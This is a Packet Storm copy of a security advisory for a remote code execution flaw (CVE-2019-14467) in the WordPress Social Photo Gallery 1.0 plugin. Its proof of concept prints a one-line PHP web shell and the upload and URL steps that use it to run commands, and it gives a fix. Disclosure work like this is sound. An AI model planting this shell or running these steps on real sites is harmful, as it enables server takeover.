what you don't know can hurt you

WordPress Social Photo Gallery 1.0 Remote Code Execution

WordPress Social Photo Gallery 1.0 Remote Code Execution
Posted Nov 15, 2019
Authored by Prestigia Seguridad

WordPress Social Gallery plugin version 1.0 suffers from a remote code execution vulnerability.

tags | exploit, remote, code execution
advisories | CVE-2019-14467
MD5 | 1bb9591e3cec19df6dd4e98eaea723af

WordPress Social Photo Gallery 1.0 Remote Code Execution

Change Mirror Download

=============================================
PRESTIGIA SEGURIDAD ALERT 2019-001
- Original release date: July 31, 2019
- Last revised: November 13, 2019
- Discovered by: Prestigia Seguridad
- Severity: 7,5/10 (CVSS Base Score)
- CVE-ID: CVE-2019-14467
=============================================

I. VULNERABILITY
-------------------------
WordPress Plugin Social Photo Gallery 1.0 - Remote Code Execution

II. BACKGROUND
-------------------------
Social Gallery is the ultimate lightbox plugin for WordPress. Your images
deserve to be experienced and shared, to spark a response as they travel
the social web, and to work for you by generating more fans and more Likes
for your content.

III. DESCRIPTION
-------------------------
The version of WordPress Plugin Social Photo Gallery is affected by a
Remote Code Execution vulnerability.

The application does not check the extension when a imagen of a album is
uploaded, resulting in a execution of php code.

To exploit the vulnerability only is needed create a album in the
application and attach a malicious php file in the cover photo album.

IV. PROOF OF CONCEPT
-------------------------

1. Create a .php archive (cmd.php):

<?php system($_GET['cmd']); ?>

2. Click Add Album, select the name, for example "demo" and in the "Cover
Photo" select the cmd.php file.

3. Load the next URL and magic:

http://127.0.0.1/wordpress/wp-content/uploads/socialphotogallery/demo/cmd.php?cmd=ls

V. BUSINESS IMPACT
-------------------------
Execute local commands in the server result from these attacks.

VI. SYSTEMS AFFECTED
-------------------------
WordPress Plugin Social Photo Gallery 1.0

VII. SOLUTION
-------------------------
The solution is only allow upload Digital Image Files: TIFF, JPEG, GIF, PNG

VIII. REFERENCES
-------------------------
https://wordpress.org/plugins/social-photo-gallery/

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by Prestigia Seguridad
Email: info@prestigiaonline.com

X. REVISION HISTORY
-------------------------
July 31, 2019 1: Initial release
November 13, 2019 2: Revision to send to lists

XI. DISCLOSURE TIMELINE
-------------------------
July 31, 2019 1: Vulnerability acquired by Prestigia Seguridad
July 31, 2019 2: Email to vendor without response
August 15, 2019 3: Second email to vendor without response
November 13, 2019 4: Send to the Full-Disclosure lists

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.

XIII. ABOUT
-------------------------
Prestigia Seguridad
https://seguridad.prestigia.es/


Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

April 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    60 Files
  • 2
    Apr 2nd
    18 Files
  • 3
    Apr 3rd
    0 Files
  • 4
    Apr 4th
    0 Files
  • 5
    Apr 5th
    0 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    0 Files
  • 9
    Apr 9th
    0 Files
  • 10
    Apr 10th
    0 Files
  • 11
    Apr 11th
    0 Files
  • 12
    Apr 12th
    0 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2016 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close